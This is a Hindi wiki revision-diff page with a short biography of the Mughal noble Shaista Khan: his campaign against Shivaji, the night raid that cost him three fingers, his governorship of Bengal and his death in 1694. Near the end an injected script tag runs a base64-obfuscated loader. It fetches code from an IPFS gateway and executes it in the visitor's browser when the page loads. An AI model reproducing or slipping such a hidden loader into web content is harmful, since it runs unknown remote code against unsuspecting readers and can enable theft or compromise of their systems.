Difference between revisions of "शाइस्ता ख़ाँ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
शाइस्ता ख़ाँ [[औरंगज़ेब]] के मामा थे। 1660 ई. में औरंगज़ेब ने उसे विशेष रूप से [[शिवाजी]] का दमन करने के लिए दक्षिण का सूबेदार नियुक्त किया। प्रारम्भ में शाइस्ता ख़ाँ को कुछ सफलता मिली, किन्तु वर्षाकाल में जब वह [[पूना]] लौट गया तब शिवाजी ने रात्री में अचानक उस पर आक्रमण कर दिया। बड़ी कठिनता से शाइस्ता ख़ाँ ने अपने प्राणों की रक्षा की, किन्तु उसे अपनी तीन अंगुलियों  से हाथ धोना पड़ा तथा उसका पुत्र भी मारा गया। उपरान्त उसका तबादला [[अखण्डित बंगाल|बंगाल]] को कर दिया गया, जहाँ उसने 30 वर्षों तक विशेष सफलतापूर्वक शासन किया। उसने बंगाल के समुद्र तटवर्ती भू-भाग में लूटमार करने वाले [[पुर्तग़ाली]] समुद्री डाकुओं का दमन किया और [[अराकान]] के राजा से [[चिरगाँव ज़िला]] भी छीन लिया। 1694 ई. में 90 वर्ष से भी अधिक आयु में वह [[आगरा]] में मर गये।
+
'''शाइस्ता ख़ाँ''' [[मुग़ल]] [[औरंगज़ेब|बादशाह औरंगज़ेब]] का मामा था। 1660 ई. में औरंगज़ेब ने उसे विशेष रूप से [[शिवाजी]] का दमन करने के लिए दक्षिण का [[सूबेदार]] नियुक्त किया था।
  
{{प्रचार}}
+
*छत्रपति शिवाजी के विरुद्ध प्रारम्भ में शाइस्ता ख़ाँ को कुछ सफलता मिली, किन्तु वर्षाकाल में जब वह [[पूना]] लौट गया, तब शिवाजी ने रात्रि में अचानक उस पर आक्रमण कर दिया।
{{लेख प्रगति
+
*शिवाजी द्वारा अचानक किये गए आक्रमण से शाइस्ता ख़ाँ ने बड़ी कठिनता से अपने प्राणों की रक्षा की, किन्तु उसे अपनी तीन अंगुलियों से हाथ धोना पड़ा तथा उसका पुत्र भी मारा गया।
|आधार=
+
*बाद के दिनों में शाइस्ता ख़ाँ का तबादला [[अखण्डित बंगाल|बंगाल]] कर दिया गया, जहाँ उसने 30 वर्षों तक विशेष सफलतापूर्वक शासन किया।
|प्रारम्भिक=प्रारम्भिक1
+
*शाइस्ता ख़ाँ ने बंगाल के समुद्र तटवर्ती भू-भाग में लूटमार करने वाले [[पुर्तग़ाली]] समुद्री डाकुओं का दमन किया और [[अराकान]] के राजा से चिरगाँव ज़िला भी छीन लिया।
|माध्यमिक=
+
*1694 ई. में 90 वर्ष से भी अधिक आयु में शाइस्ता ख़ाँ [[आगरा]], [[उत्तर प्रदेश]] में मृत्यु को प्राप्त हुआ।
|पूर्णता=
+
 
|शोध=
+
 
}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{मराठा साम्राज्य}}
 
{{मराठा साम्राज्य}}
[[Category:मुग़ल_साम्राज्य]][[Category:मराठा_साम्राज्य]][[Category:इतिहास_कोश]]__INDEX__
+
[[Category:मुग़ल_साम्राज्य]][[Category:मराठा_साम्राज्य]][[Category:चरित कोश]][[Category:जीवनी साहित्य]][[Category:इतिहास_कोश]]
 +
__INDEX__

Latest revision as of 11:39, 3 May 2015

shaista khaan mugal badashah aurangazeb ka mama tha. 1660 ee. mean aurangazeb ne use vishesh roop se shivaji ka daman karane ke lie dakshin ka soobedar niyukt kiya tha.

  • chhatrapati shivaji ke viruddh prarambh mean shaista khaan ko kuchh saphalata mili, kintu varshakal mean jab vah poona laut gaya, tab shivaji ne ratri mean achanak us par akraman kar diya.
  • shivaji dvara achanak kiye ge akraman se shaista khaan ne b di kathinata se apane pranoan ki raksha ki, kintu use apani tin aanguliyoan se hath dhona p da tatha usaka putr bhi mara gaya.
  • bad ke dinoan mean shaista khaan ka tabadala bangal kar diya gaya, jahaan usane 30 varshoan tak vishesh saphalatapoorvak shasan kiya.
  • shaista khaan ne bangal ke samudr tatavarti bhoo-bhag mean lootamar karane vale purtagali samudri dakuoan ka daman kiya aur arakan ke raja se chiragaanv zila bhi chhin liya.
  • 1694 ee. mean 90 varsh se bhi adhik ayu mean shaista khaan agara, uttar pradesh mean mrityu ko prapt hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh